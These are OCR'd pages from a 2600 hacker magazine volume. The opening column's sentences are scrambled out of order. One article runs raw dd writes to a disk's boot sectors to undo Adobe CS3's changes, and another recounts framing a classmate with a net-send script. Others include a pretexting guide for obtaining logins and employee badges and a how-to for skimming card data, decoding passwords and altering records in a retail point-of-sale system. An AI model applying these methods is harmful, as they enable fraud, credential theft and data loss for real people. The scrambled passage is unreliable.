we don’t believe in truth and justice - it’s just that we’d like to figure out for ourselves what those things are instead of adopting definitions supplied by teachers, governments, and corporations. People who hack, who question conventional wisdom, are called crazy; but when they inspire other people to ask questions they are called subversives. Looked at another way, subversion is a form of sharing. And I’ve always found that computer networks are an excellent way to share. All of my very best acts of subversion would not have been possible without computers. In the 1990s I co-founded Bad Subjects, a publication devoted to radical politics and pop culture, which most people read on gopher and then, later, on the web. That experience was as transformative to me as an adult as meeting those computer hackers was when I was a kid. I found a community of people online who were writing about how capitalism and other social institutions molded our lives and confined us. I became aware of the political choices I was making every day. I realized that even

184

Is there a person you’re aware of who is a known entity and has made a noteworthy accomplishment of some sort that would be recognized by the hacker community? Do you feel this individual would have something of interest to say about what it means to be a hacker? If so. I went from tinkering with my personal gender identity to forming connections with people who wanted to tinker with the vast fabric of society and history. Annalee Newitz is the editor-in-chief of “io9. and quite another to upgrade your civilization.” and the “Washington Post. Of course. it’s important to know what you’d like your society to be like when it grows up. buy a computer. I hope that they’ll start with computers and networks. and chat on mailing lists with other people who had the leisure time to join me. She has contributed to “Wired.com/2600
185
. and not stop there.com. we’ve featured commentaries from:
The Cheshire Catalyst Bruce Schneier Phiber Optik Bill Squire Virgil Griffith Jason Scott Bre Pettis Mitch Altman Rop Gonggrijp Barry Wels Nick Farr
We want this list to grow even bigger. and reconfigure. the future will know in retrospect as the first stirrings of liberation. Still.com with details. from our religions to our economic systems. just the important stuff.
Johannes Grenzfurthner
Yes. What today people call crimes.VOLUME 26
my ability to become “aware of political choices” was partly a result of having enough money to get a college education.com. We won't send you a lot of useless crap. And so that’s why.
twitter.THE HACKER DIGEST . I have tried to inspire people to hack. In the past.
Hacker Perspective is a regular column featuring the views of various luminaries known to the hacker community and oftentimes the mainstream as well. I want people to understand that we can ruthlessly hack everything that exists. it’s one thing to upgrade your machine from a proprietary OS to a free one. then let us know and we will try to entice them into writing the next Hacker Perspective! Email us at articles@2600. subvert.” and is the co-editor of “She’s Such a Geek” (Seal Press). we can't believe we're saying it either but this could be a real good way to stay in touch during important hacker events.” “New Scientist.” a blog about science and science fiction. in writing for publications from Wired to my blog io9.

2007. there are usually a good 63 sectors or so that are used for executable boot code.5”. Doing anything listed in this article could render your computer a doorstop. and then everything was hunky-dorey. Then. which is fairly common. Then the screen went blank. This continued ad infinitum until he powered off the laptop. All bets are off for any other configuration. Problem solved! I was sure that whatever had b0rked his boot area couldn’t have been Adobe CS3. He ran the Adobe updates. ext3 Ubuntu partition. The Master Boot Record lives in the first 512 bytes of your computer’s hard disk. I ran parted and saw all the partitions there. With that said. and not to steal software because it is wrong/bad/illegal/immoral/unpatriotic/ etc. But this obviously did not apply to my friend’s XP installation. which it found at hd0. he saw the typical POST screen. His partition scheme was like this: 200MB ext3 boot partition. just as he had described them. to dual boot systems! Searches about
THE HACKER DIGEST .1). Linux’s boot loader. with Dreamweaver. Another search turned up a page from 2004. which yielded an Ubuntu Forum archive from November. Everything seemed to be intact. For this article. then the GRUB message. Premier. Some assumed it was Vista-related. and it said it had installed all 16 sectors and everything was okay. Sorry. and booted into live mode. A few more times. my friend brought his laptop to me with a problem. all lead to the same conclusion: Adobe software was boogering GRUB somehow! Why would any Adobe program need to write data to the boot area? It was Google time! I did a search for “photoshop” and “grub”. several people seemed to have the same symptoms. In it. Everything was working. I did so. Acrobat Professional. again. It contains the partition table and the executable code needed to make the computer give you more than a blank stare. I whipped out my trusty Ubuntu CD. if you are dual-booting with Windows and most any modern Linux distro. For single-boot Windows systems. a good chunk of this boot area is unused. NTFS XP Partition. I ran GRUB from the live CD and told it to find stage1. I cannot help you. Everything seemed cool until he restarted the computer. The methods described in this article also require a rudimentary understanding of the dd program. I used the Ubuntu CD to reinstall GRUB. he decided to install Adobe CS3. as it was the last change made before the problem occurred. so I restarted for good measure. a few more tests. He could choose between XP and Ubuntu at boot with no problem.com)
I will begin with the usual semi-legalese about this article being for instructional purposes only. a FAT32 partition. and another NTFS partition. followed by the boot menu. (If you are using LILO and are affected by the following symptoms. He had installed XP and Ubuntu in a dual-boot configuration with GRUB. However. then “GRUB Loading Stage 1. This article applies to dual-boot Linux systems using GRUB and a boot partition. this area is used in part by GRUB. I will call this the boot area. Then he got the POST screen again. CS3 had a valid serial number. and you could lose all your data if you don’t know what you are doing. My friend was sure that installing CS3 was the cause. During boot. My friend suggested that I run Photoshop. BAM! GRUB once again got stuck in a loop! Again. setup(hd0).) One day. and was activated. I did the usual root(hd0. and the knowledge that you can nuke your system should you commit a typo during its use. So.1. It seems CS2 was doing something similar. He assured me he had not altered CS3’s files in any way (nor would he have known how).VOLUME 26
186
. could it? I rebooted the machine and GRUB came up... then XP with no problems! Win! Everything was cool. with dual boot systems. let us begin. After that first sector. Extended partition where he kept the swap.Hey Adobe!
Leave my Boot Loader Alone!
by dolst (dolst. GRUB still played nice. before the first partition. then restarted the computer.

this is not done solely at install. The resulting command looks like this:
dd if=c:\unfiddle\clean. ran CS3. I needed to make sure this happened automatically. I came up with this version of unfiddle. But for those of us who use GRUB to boot into multiple OSes.0.bat:
start “dummy” “%~f1” ping -n 30 127. Meanwhile. bat every time we use CS3 would be tedious.exe” “start” loads whatever program is listed during the calling of unfiddle.\PhysicalDrive0” is the Windows equivalent of /dev/sda. You must be absolutely sure you have exactly the right file.1 (localhost) thirty times. whose response is allegedly that “it affects so few people” as to be unworthy of their attention. Apparently Adobe does not care about this. and the MD5 sums were different. but you don’t want to have to go there!) I put the above command into a file called “c:\unfiddle\unfiddle. I’m no hex-editing guru. On most Windows systems. I had to determine which part of the boot area was being affected. when we run an Adobe application. What now? We need a method to substitute the clean boot area for the fiddled-with boot area.bat is still executing. This creates a snapshot of the clean boot area in c:\unfiddle\clean.\PhysicalDrive0 of=c:\ ➥unfiddle\clean.img. this seems to have no adverse effect. The “dummy” is needed because of a quirk that requires the first parameter of start in quotes to be the title of any new command window that may be opened in the process. Illustrator. In the interest of preventing piracy. Adobe’s “protection” stomps all over a vital portion of the hard drive.0. it was clear some essential part of GRUB got wiped. Now. After reinstalling GRUB. theoretically. CS3 happily “fixes” it for you. While unfiddle runs. I booted the live CD. any other) program we want to run.exe into a default Windows path so it could be called from the command line as I pleased.1 dd if=c:\unfiddle\clean. he should at least have the option to reverse it every time it happens. I copied that same sector to another file. Initially. making the computer unbootable.bat”.\ ➥PhysicalDrive0 bs=1024 count=8
The batch file is called with the path to the desired Adobe program following it. and the Windows version of dd is just as powerful (and dangerous in unskilled or malicious hands). The “%~f1” is the full path to the Adobe (or.img bs=1024 count=8 “\\. For example: C:\unfiddle\unfiddle. img” to the first 16 sectors of the drive. or you WILL render your computer unbootable. I created a clean image of the first 8K of the physical hard drive. If you have repaired it in the interest of simply booting your computer. including Photoshop.0. So. so the actual MBR was not altered. unfiddle. Then. Dreamweaver.VOLUME 26
Adobe and the master boot record produced a page that mentioned Adobe CS3 writes its serial number to the MBR. I copied the beginning of the drive to a file on its FAT32 partition. Adobe determined it was okay to write that serial number to its users’ boot area. and looked at the two different 8K files in a hex editor. Some say they have mentioned this to Adobe. but it did put me on the right track. This meant the change was somewhere in those 16 sectors. Furthermore. but based on the evidence. Still. However. So. they will still potentially ruin your dual-boot system.THE HACKER DIGEST . The two files had identical MD5 checksums.bat itself.img of=\\. So I decided that if Joe User couldn’t prevent Adobe from mucking up his boot loader. This is just a
187
. despite already requiring a serial number and activation. manually running unfiddle. A hard drive sector is 512 bytes-the size of the MBR-and I remembered GRUB’s “16 sectors” message. even if you have paid Adobe real money for their software. you can boot with an Ubuntu live CD after every use of CS3. I booted into Windows. results in a check of this area of the hard drive. Windows refers to block devices and file systems differently than Linux. like so: dd if=\\. This time I changed dd’s block count to 16.img of=\\. then continues running unfiddle. once again rendering your machine unbootable! Sure.bat.0. possibly beyond GRUB’s help. then created a shortcut to it on the desktop. First. With dd. I copied dd. The larger block size of “bs=1024 count=8” yields better performance than the mathematically identical “bs=512 count=16”. Next. (The Ubuntu live CD has options for reconstructing partition tables. rebooted with the Ubuntu CD and repeated the whole dd process. but this gets tiresome. this program begins loading. Comparing the clean GRUB image to the molested version showed both were identical before block 0x1400 (5120 decimal) and after 0x1600 (5632 decimal).bat “C:\ ➥Program Files\Adobe\Adobe ➥ Photoshop CS3\Photoshop. I only copied the first 512 bytes (aka the MBR itself). After letting CS3 have its way. Thus. I created a batch file that would write this clean 8K image to the first 16 sectors of the hard drive. This is where dd for Windows comes in. This turned out not to be technically accurate.\ ➥PhysicalDrive0 bs=1024 count=8
This command writes the contents of “clean. or Premier. The next thing I have it do is ping 127. Running any CS3 software. we have a way to fix our boot area. the principal is the same. I went ahead and booted back into XP.

Trinity Rescue. Then you can alter their targets just like any others. which makes it run at shutdown and restart.. In fact. However. you will need to use a bootable CD of some type (Ubuntu. Dreamweaver.112. which is also used by Autodesk 3DS Max and other programs. Using the Windows Group Policy Editor. One final amusing tidbit: the licensing software Adobe uses is FLEXnet. this workaround will suffice. then re-select the same icon it’s already using. just paste c:\ unfiddle\unfiddle. I kept the original version of unfiddle. Photoshop. you can still reboot your computer and have it do what it is supposed to.) For this occasion. nothing less. If 30 pings are not enough to keep unfiddle busy while CS3 is still loading.de/ ➥delphi/freeware/xvi32/xvi32.bat and named it uflite.com/ ➥forums/t251090-photoshop-cs-on➥dual-boot-linuxwinxp-systems. The ramifications of software piracy are a discussion for another day. and run roughshod over your boot area.bat to the shutdown scripts. etc) to restore the boot area from your clean image file.geocities. there are still scenarios in which these nefarious applications may execute without your consent. which means you can’t change their target. In these cases. (Fortunately. Those of us old enough to remember VCRs can now be heard groaning at the mention of that name. Adobe CS3 seems to like to communicate with 192. I hope Adobe will adopt a less destructive method for protecting their intellectual property.0. (Notice the letter “O”. and fiddling with the boot area. Unfortunately.htm
Links
188
. Doubleclicking a Photoshop file to open it.bat. The choice is yours. Right-click the shortcut. create a web page. Happy unfiddling and. or whatever. but if you don’t do it. Windows DD http://www. go to “change icon”.THE HACKER DIGEST .bat on the desktop for periodic use in the case of hibernation (which does not run shutdown scripts) and/ or accidental powering off without shutdown. A few seconds after this finishes. edit photos. Then.velocityreviews. which is owned by Omiture. the unintended consequences of Adobe’s anti-piracy methods. BartPE. unfiddle. That subject is beyond the scope of this article. in this case. make a music video.VOLUME 26
way for it to bide its time. When you’re done.168. make the “cure” as bad as the disease. in the “target” section.com/ ➥adobe-replies-to-spy-concerns First mention of Macrovision involvement http://www. this looks like an internal IP address. having Adobe Update run spontaneously.chmaas. In a sunshine-and-lollipop fairytale world. as always. it is a subdomain of 2o7. starting. this would be all you have to do to be free of Adobe’s fiddling. A few shortcuts may be “unadvertised links”.net/dd XVI32 Hex Editor http://www. the free Adobe PDF Reader is safe.com/ ➥thestarman3/asm/mbr/NTFSBR. nothing more. which should already be in quotes. or whatever. Another quick note should be made here.net.bat finishes pinging and then runs dd to *un*fiddle the boot area! Use the program.php?t=603435 Velocity Reviews thread from 2004.fixya. about CS2 http://www. This step may seem redundant. At first glance. if uflite is not run and the boot area has been fiddled with. It was created by Macrovision. I left a shortcut to uflite. perpetrator of the early commercial video copy-protection schemes. not the number zero in that last “octet”.com/support/ ➥t800405-adobe_cs3_macrovision_ ➥drm_residue Explains how Windows boot area is mostly zeroed out http://www. is loading. Until then. initializing.centernetworks.chrysocome. it “forgets” where the icon is. Take a few minutes to go through and edit all your Adobe shortcuts in the start menu to reflect this change. Then. Then you’ll have to track down the icon’s EXE file.2o7. 50.net.htm Ubuntu forum where question was first asked about Adobe and MBR..0. And finally. the program finishes loading.org/ ➥showthread. if you care.handshake. you can increase the count to 40. All it does is the dd copy. Next. or even 100.1 it out in your hosts file. and is ready to use. Nov 2007 http://ubuntuforums. surf wisely! Obligatory shoutouts to Foxfire and Warmech. but you can delete them and replace them with manually-created shortcuts to their respective EXEs. it should look like the example above.bat in front of the existing target name.html First lead on link to Adobe “writing to the MBR” http://www. if you do not have CS3. Meanwhile.) Feel free to 127. and their effect on legitimate users. or even viewing an online PDF in your browser can jeopardize your boot area. I added uflite.

though. He was a script-kiddie at best. or any other OS besides Windows. I looked around and it was on the monitor of every other machine in the class as well. and have the message reflect as though came from his machine. I entered my keyboarding class and was greeted by the teacher and a new seating arrangement. but it was so much fun. He did have about 60 pounds on me.25” and the hostname was “LAB-10-0-2-25”. A few minutes after the instructor’s lesson started. could barely talk. but was unable to test if the script worked. I had to take some sort of action. and was actually rewarded for discovering this ability.
by Valnour
I had a bully in my freshman year of high school. each computer had a wide open share that allowed the student to exchange documents with the teacher. and had never heard of Linux. and uploaded the script.
189
. He had shown me the “net send” command. The IP was something like “10. I first began reading 2600 and other hacker publications. I had to do something to this kid to get him off my back. broken into ATM machines. At the time. and all of the exploits that he had apparently “discovered” had been patched years ago. He wasn’t much of a bully. I would no longer have to sit by the lamer. *BSD. I wrote a small script that would send a message to every machine in the school that said “ALL YOUR BASE ARE BELONG TO US!!!! MR. I am sure many of you can identify with me at that age and. I did not know if it was possible to execute the script from another machine. Awesome. but that was about it.VOLUME 26
One day. I read it a couple of times. being a few inches shorter than me. The Art of Intrusion. but it was probably unintentional. looking back. Hacking: The Art of Exploitation) he started to tell me about the “exploits” he and his “gang” had discovered. They checked the IP of every machine. Being unfamiliar with Windows. This share was also readable and writable by every student in the class on every other student’s computer. in a computer lab with about 30 computers. he did not get in trouble for this. He said that he and his gang of hackers had stolen credit card numbers.0. this command makes a dialog box appear on a computer in your network. and had accidentally sent a blank message to every machine in the school.2. This was in a keyboarding class. Also.Revenge Is a dish Best served Cold. and after seeing some of the books I would bring to class (Learning Perl. I then walked back to my seat and logged on. He’s the kind that was on the fast track to an MCSE. and could catch up on my reading after my keyboarding lessons were completed. This uniquely identified the lab number (2) and computer (25) associated with each IP.” and this was just too much. So I logged onto his computer before he got there and scheduled the script to run 30 minutes later. a message popped up on my screen. Apparently the system administrator at our school had never seen this command. and had even gotten into the school’s network on multiple occasions. All of these computers were running Windows 2000 (or possibly XP). I was also taking a class entitled “Cisco Networking” with a friend of mine who was a big Windows nerd. The next day I got to class early. couldn’t read. Justice was served. This guy couldn’t type. It was from the bully’s IP. This guy was a real lamer. A moment later. They hauled off the bully and gave him a week’s suspension. I was beginning to identify with the hacker world. he began to harass me via “net send. To those unfamiliar to Windows. My revenge on this poor sap was immature and unnecessary. Being a trusted student. The bully of mine was a real loser. But I was not that lucky. along with a message. I was a big nerd on top of all of this. Every computer in the lab had the hostname and IP address of that particular computer printed on a label that was placed on the back of the computer just above the power supply. but very much considered myself a padawan without a master. and it contained my message. and began to use it quite frequently. and had been using Linux at home exclusively for about 2 years. I’m not sure what the purpose of that was. the system administrator and principal came storming into the door.
THE HACKER DIGEST . and he was also the only student in school that I could semi-relate to about computers. with the IP (or maybe it was the hostname) of the originating machine. (name of system admin) SUCKS!!!” and would then delete itself. He wasn’t so much a bully as a horribly annoying experiment in verbal abuse. I accessed his network share. and discovered who the culprit was.

Skype is ok. Film props.. This is something women do with each other. You PROMISED you would get one for him. what the goal is.. your seemingly innocent request most likely won’t be questioned. and how to get the positive result from the variable of an ending. that may work for men and those who refuse to let their egos down for a second and work in reverse. In order for something to be done right. Certain hax0r suppa-stars can write books upon books on social engineering but. here’s where you have to dumb it down. we have been trained from birth to social engineer. She chooses one. She also chooses a department she is working in and finds out the managers name. An alternate phone number: I recommend grandcentral. You know nothing! You are a complete twit. It’s free and you can use it for incoming and outgoing calls. it’s really lame that some of the easiest things for chix to do hasn’t been passed on to the boys. The problem is. Again.. let me give you some great examples of what I mean. If I have to explain to you what to do after you get it. Use this to your advantage.THE HACKER DIGEST . Instead of me trying to write it out in some dimestore psycho babble. and maybe your neighbor doesn’t mind (don’t ask. It also gives you a solid base for your lie. so lets skip that. don’t tell). Borrowed WiFi: Nice to use. and we can try and make them apply to the estrogen challenged: 1) “Lisa” needs access to a company’s server. you will go far. and needing a realistic prop for a student film. You are helping this kid out.. you shouldn’t be reading this article. I have become quite aware that fellow female hackers are a rare breed. Let me break it down. I don’t think I have to remind anyone here that all of these accounts should be established using alternative alias’ and paid for with V/MC gift cards. 3) “The OMG. of course) Sound crazy? I’ve done it… it works. You are a temp. or if she can’t find one. not usually for malicious
Toolkit
190
. The first thing she does is search the company website to see if she can find the list of employees in the IT department. Women already know how to do this and it won’t work with guys doing it to guys. This has actually worked coming from a government office. and if you are a tard. Whether it’s lack of acceptance within the technical community. school projects and plays are all good excuses. She is sick with the flu but her boss told her she can work from home. That said. if you can out-tech and seem professional. They aren’t looking for this sort of security violation. You called earlier and talk to someone who said that it be no problem to come down and get a sample badge (deactivated. it makes them feel better. Men love to feel superior. You are a parent/ sibling. Your research: Always spend some time doing research on your mark. She needs a login and password. “Lisa” goes to the company and asks to speak to someone in the HR department. Who’s going to make this kid cry or get a bad grade? This will work on most women HR people. so do I!” The best way to gain trust in someone is to play the very popular game of similarities. Once again. She needs this job! Now. the fact is. In other words. she makes a few phone calls trying to figure out who the person she needs to talk to is.com. one must really have a fucking clue as to what they are doing. And let it be well known it’s not all about sexuality so much as manipulation. “Lisa” calls IT guy. This doesn’t have much to do with using sexuality to get your way.VOLUME 26
Social Engineering
From A New Perspective
by Lilith
After being in the scene since the early 90s. and she doesn’t want to ask her boss to repeat herself for fear of getting fired. “Lisa” reveals that her son/ brother is doing a student film at school and needs an ID badge as a prop. Yeah. the information on how to access the server was wrong. asking for assistance. There is a large perception that social engineering is based on knowledge and proof of presence. You will look like a fucking moron of you don’t. and frantically explains that she is a temp. or lack of interest is enough to write another text file in and of itself. 2) Need something physical? Let’s say you want to make an employee badge.

Let’s call this 16-bit number pos. but I have a close friend who screwed an operator at GTE for dialups and logins. Easy. Really anything that’s drum ‘n’ bassy sounding works well. but she now has an inside friend.dogsoft. If you can help it. could be worse ways to get information! All of this info is pretty base. out. management sucks. This is so that a 16-bit number is perfect in describing where the speaker is. now that you’ve listened to that. “Lisa” needs to get some information from someone. ➥net/test_loop.i<16. Once you have traded a few bits of personal information. 5) This is in the “I didn’t want to go there” department. so that mod[0] is Q. Key things to have in common? Work issues. out = in.y) int mod_pos(int in) { int pool. One thing women love to help men with is relationship issues. your sibling/kid is that age too..dogsoft. Oh Lisa. i. Doing something under the guise of trying to help out your girlfriend is always cool.y) #define TEST_BIT(x. So.1) == 1) pool = 1. and anything that makes you an average person. It’s a pleasure to be addressing you all in this article. try and get the info your scamming for at a later date. Let’s store the keyboard modifiers in an array called mod. so do you! Time for some personal chit chat. Blah blah. Just keep a few things in mind and you will be able to get any info out of anyone. If you are doing this over the phone. you’ve always had a certain fascination with techno music. be humble. but as a way of communicating.mp3 Ok. I use. you can download it at http://hobones. what grade are they in? You know. but boring. As far as the content of the loop is concerned. In the mp3 above I use http://hobones. and associate. Now this program is a sampler of sorts–a sample that loops. For example E held down with J. The trick here is to imagine that the bits of pos are mapped to your keyboard. Q as the least significant bit. Use the same tone of voice you use when you call your Nana.. Do they have pictures of kids? Sports knick knacks? A fucking ivy plant? Well. No comment on how well that sort of thing works in my favor. The loop is a drum loop that’s 65535 samples (or multiples of 65535) in length. Yeah. I’m going to describe this technique by embedding it into a program.wav Now if you just increment pos and wrap it around 0xffff (65535) indefinitely. People let their guard down fast. ➥net/2600_beat. be as sweet and naive as possible. I will be describing a rather simple technique for “playing” drum ‘n’ bass. In this article. /* Get half the input */ for(i=0.you con artist! In person (always advisable if you can) check out the personal workspace of your new friend. If you’re anything like me. you get a very nice drum beat–nice. I know. which can take it to as many levels as she needs. if E or J is 1 they both become 1. but hey. 4) Pity. Women adore and trust men that do good things for their ladies. Lisa did this trick with a Raytheon HR employee. PRETEND.” If you’d like to listen to this. hackers. that I’ve “discovered. Women especially love it if you ask about their kids. She didn’t get the job she came in to get information on. You can do it. they get ORed together. Get the person’s card and shoot them an email. “Lisa” starts to lay out the groundwork. Women trust easier if they can associate with you on a personal level.THE HACKER DIGEST . the Amen break works well. the result being stored in both bits. This works especially well with women.i++) if(mods[i] == 1) if(TEST_BIT(out. Be nice. pool =0.
A Simple Technique For Drum ‘N’ Bass
by SigFLUP
Good hello. Aww. When you push bits. you gain a little trust. (x|(1<<y)) ((x>>y)&1)
191
..VOLUME 26
purposes. This little routine ought to do the trick:
#define SET_BIT(x. Make sure you mention it. QWERTYUIASDFGHJK.

RaDMAN. You see what I’m talking about? The next thing we want to do is put a boundary on j so that it can’t span across one beat into another. and send me an email. to pantsbutt@gmail.THE HACKER DIGEST . return out.. }
➥ /* get the next one */
if((pos2 -1) %0xffff != lpos)
➥ /* if pos2 is not linear store ➥ it in j */
j = (float)pos2. so you can run it directly. The last trick is a little more complex but it produces a sound that is really quite acceptable to the listener. Let’s introduce a new variable...dogsoft. otherwise it will leave speed at 1.. The best way to describe what a span is is to show you:
pos 1 2 3 4 5 6 7 8 9 10 ➥ 11 12 13 14 15 16 17 18 19 20 . if((j_int . } /* HERE TOO */ j+= speed.i++) if(mods[i] == 1 && pool == 1) out = SET_BIT(out. if(bend_up == 1) speed *= CONSTANT. int len) { int i. Typically I find this to be byte zero of the sample.net/dnb..i). all cuts will be done on the beat or on the half-beat or whatever. /* stores the previous ➥ return from mod_pos */ int pos2 /* return from mod_pos */ float j. If speed is two. We store how much we’re incrementing it in speed. for instance.5f. /* store previous ➥ return from pos */ pos2 = mod_pos(pos). span A A B B B B C C C C ➥ D D D D E F F F F G . Good luck. 128 . /* HERE */ for(i=0.0f. else q++. ➥tgz. Imagine that keys Z and X represent a pitch-bender. if you make any music with this or improve the technique. It’s a float so that we can increment it by fractions of one.VOLUME 26
/* Compute and store where appropriate */ for(i=0. q = 0. Fun isn’t it!? If your sample was ONE TWO THREE FOUR and you OR a significant bit with a lesser significant bit you get ONE THREE TWO FOUR.009f is nice) if Z or X is pressed. This is really good for producing silence breaks and coming back up on a beat. we are now incrementing j by two instead of one and we get a fast beat that is still on beat. /* j and how much ➥ we increment it. It loops the first 65535 samples of the audio-file you provide as an argument. You need SoX. If we map Z to bend_up and X to bend_down we can replace /* HERE */ with
int q. speed */ /* fill an audio buffer. Lets map the space bar to mod[17] and add if(mod[17] == 1 && pool == 1) return SILENCE between the “Get half the input” for-loop and the “Compute and store where appropriate” for-loop. if(bend_down == 1) speed /= CONSTANT. if we only modify j at the beginning of each new span to mod_pos and increment it by one the rest of the time it follows mod_pos:
int lpos. j. you get a really nice effect. ➥ /*sample is our sample data */
Now we need a good place to change the speed. }
Still increment and wrap pos but use mod_ pos(pos) as the speaker position instead.com Shouts to Citadel. speed.
Now. int pos2.i<len. if(q == 2) speed = 1. 8.pos2) > (0xffff/ ➥ NUMBER_OF_BEATS_IN_SAMPLE) ) buffer[i] = SILENCE /* span ➥ spans over one beat */ else buffer[i] = sample[j_int].
Any non-linear return from mod_pos is considered a new span. pos++. This is a script. See what happens now? By holding down space and any combinations of bits you get a choppy sort of sound. 32. /* increment and wrap pos */ pos%=0xffff.i<16.0f. libsdl and you need to be able to compile things. Say 0. We’ll define SILENCE as someplace in the sample where the speaker is at rest. 64. ➥ *buffer. 16. Imagine that any change that mod_pos(pos) returns from pos is a new span.
This will bend up or down by CONSTANT (I find 1.. int j_int.i++) { lpos = pos2. Do you see what this does? If you press QWERTYUIASDFGHJK so that you have one repeating beat and bend up or down. You can download this complete program from http://hobones. j_int&=0xffff. else q++. We can do this by replacing /* HERE TOO */ with
j_int = (int)j. Jason Scott and the BlockParty crowd!
192
. Do you see what’s going on here? We’re using the rhythm of binary numbers! If you use a sample that has 2. and so on beats in it. with length len */ void audio(unsigned char ➥ *buffer.. 4. Now let’s add a couple of tricks. you may be asking yourself why j is a float. mod_pos 1 2 1 2 3 4 3 4 5 6 11 ➥ 12 13 14 8 7 8 9 10 9 .

If you want to wreak real havoc. The system developer made a big deal about how his system had access controls to prevent unauthorized access. appear to leave privileged accounts on the system for themselves without passwords. and puts a response file back into the queue directory in a file with the extension .. a=z–the uppercase alphabet has numbers at the beginning and is shifted by ten. special pricing.
193
.” the OPERATOR table which stores the user names.exe. since file modification is fully allowed. it simply uses a shared drive on a workstation. here it is: all lower case letters are shifted by one b=a c=b. a new POS called ABS was put into place by a company called Retail Automation. Then watchDirectory will do whatever you want with these files. Once the transaction is complete. X-Charge then reads in this information.req that contains details of the purchase including the amount of purchase. All of the data is free and clear and. The DAT file is simply a collection of fixed-length records concatenated together and the KEY file is the index into the data file. and authority levels for ABS. expiration date. This authorization server is responsible for receiving credit card authorization requests. and his wife. there is no security in place to prevent the theft or modification of the raw data files.. but that doesn’t mean that it doesn’t send that information back and forth to the credit card authorization system in the clear. X-Charge interacts with ABS via a queue directory. There even exists a tool called watchDirectory that will register itself with Windows so that it is notified when files change in the queue directory. In our store. Tom. sending them to the merchant server over the Internet (encrypted). sends it to the merchant service. passwords. One especially boring day I decided to pick this table apart and it only took me 20 minutes. I did find one table that was “encrypted. A simple application waits until a predetermined hour and then copies all of the store’s data onto the drive. During the course of my employment. they installed the X-Charge authorization server on one of the POS machines. The system does not use a client/server architecture for its backend. Lisa. With this table you can simply log in as any user that you want without having to use raw files or a hex editor. The request files all start with the text “XC_SALE” (quotes included). you can break out your favorite hex editor and change prices or modify receipts.THE HACKER DIGEST .. Z=9. A=K . It appears that Retail Automation uses the X-Charge system to integrate credit card authorization into ABS. A request file is created with the extension .. The fact that they are on disk even for a limited amount of time means that the you can skim this data fairly easily by simply monitoring the queue directory. and then sending the response back to the calling POS. Retail Automation is even nice enough to provide a DOS executable in the SYSDATA directory. previous transactions. I began to look around the system and it has made for many hours of fun. which will happily open any DAT file and sort it into records for your viewing pleasure. If you don’t have 20 minutes to figure it out. where the passwords are set the same as the user name. I have not determined whether disk sectors are wiped when the files are deleted but it might be an interesting exercise to scan unallocated space for these data. The developer. once everything settled down.ans. credit card number. 0=A 1=B. so the files should not be too difficult to spot... I tried to stay out of the way the week of the installation but. The data files are in a format called ISAM. There also appear to be superuser accounts named SYSADM and SECADM. since all of the POS and back office machines need access to read and modify the data. called vcfview. The table was encoded with a shifted alphabet substitution cipher. contracts. but I found it trivial to simply pull up my store’s list of customers. Each table is a set of two files. a DAT file and a KEY file. Lastly. The system does appear to be decent in that it doesn’t permanently store any credit card information. the developer thought it prudent to create a backup routine for our store by using a series of thumb drives. from emailing them to copying them to another location for you to peruse at your leisure. which helps pass the time.VOLUME 26
Retail Automation ABS
by L00dHum
I have been working in a hardware store part-time in order to put myself through college. the answer and request files are deleted. and all of the information from the magnetic stripe including name. and a whole host of other information just by viewing the raw data files.

It is almost always the people on the inside that you have to worry about.80. ➥macromedia.com/go/getflashplayer” ➥ type=”application/x-shockwave ➥-flash” width=”486” height=”258”></embed>’) document. but for a full list of locations you can visit their website at http://retailautomation ➥.com’ setRegister r:2 pop label68: push r:2. We then view the source code of the web page to locate the SWF file that loads the audio streaming control:
<script type=text/javascript> player = function (est){ document.com/sites/ ➥mmradio.com/ ➥sites/mmradio. ‘CALLSIGN’ getMember push ‘CALLSIGN’.com/files/players/ TeleRadio.. we disassemble the SWF using flasm disassembler (http://flasm.THE HACKER DIGEST . ‘XEAWAM’
We also search for the call sign:
Now that we have the address for the XML config that the player uses. port.write(‘<param name=”movie” ➥value=”http://www.streamtheworld.biz/. ‘/streaminfo. more than those on the outside. ➥streamtheworld.write(‘<param name= ➥”quality” value=”high”>’) document.69</serverip> <serverport>80</serverport> <serverport_bak>3690 ➥</serverport_bak> <mount>XEAWAM</mount> <buffersize>90000</buffersize> <messageconnection>CONNECTION IN ➥ PROGRESS.0” width=”486” height=”258”>’) document.com/player/379).
by mr_cow
ConneCting to StreamtheWOrld Audio StreAm direCtly
In this article. Through my meager interactions with the developer.write(‘</object>’) }</script><script>
Next. ➥com/streaminfo. to see if there are any other parameters that we might have to pass in the stream URL: function2 StartStream ➥ (r:4=’statemessage’.sourceforge ➥. Hopefully they get a clue before any of their customers are harmed by their incompetence. ➥swf?’+est+’”quality=”high” ➥pluginspage=”http://www.0..php? ➥CALLSIGN=’.19. r:3.cab#version=7.net/) and search for the stream’s XML configuration.54. we open it in our web browser:
http://provisioning. the following part of the disassembled SWF builds the address:
push ‘http://provisioning.mmradio. coupled with what I have seen by exploring the system. and mount parameters:
<config_stream> <serverip>208.swf?’+est+’”>’) document. it appears that Retail Automation is extremely cavalier when dealing with other people’s proprietary and personal information.write(‘<embed src=”http:// ➥www. First. ➥com/files/players/TeleRadio.macro ➥media.
In this example.php?CALLSIGN=XEAWAM
The XML config contains the server. ➥r:6=’mount’) (r:1=’_root’) push r:_root setRegister r:2 pop push UNDEF
194
. we search for those variables in our previously disassembled SWF source code. it is pretty easy to swipe the drive and have a copy of the data for yourself or your next employer.write(‘<object classid= ➥”clsid:D27CDB6E-AE6D11cf-96B8-444553540000” codebase=”http://download. we go to the web page that has a client we suspect connects to a streamtheworld server.com/files/players/ ➥TeleRadio.</messageconnection> .VOLUME 26
Since at least one of these drives is kept in a workstation at all times.swf
Next. ➥r:7=’serverip’.mmradio.mmradio. For this page.com/) audio stream without using the provided web client. ➥r:5=’serverport’.com/pub/shockwave/cabs/ ➥flash/swflash.stream ➥theworld. the SWF URL is located in the value parameter of the movie control:
http://www. ABS is run mostly by hardware stores and other supply houses. for this example I’ll use the MMRadio client (http://www.mmradio. I’ll show you how to connect directly to a streamtheworld (http://www...com/sites/mmradio.

At the moment.. the StartStream function assembles the audio stream address. Both HOPE attendees and German operatives tell us that one gets a burst of energy similar to all of those energy drinks that are out there without the "energy drink crash" that usually comes when you stop consuming them. ➥ ‘event_changestatus’ callMethod pop push ‘urltoload’. vlc.. this caffeinated. For more Mexican streamtheworld sites. For those of you running an office or a hacker space.54. so we only use the browser to check that we’re returned an MP3.com/). Of course. we have to see if there are any additional parameters we need to pass to the server to get the stream.69:80/XEAWAM? ➥streamtheworld_user=1
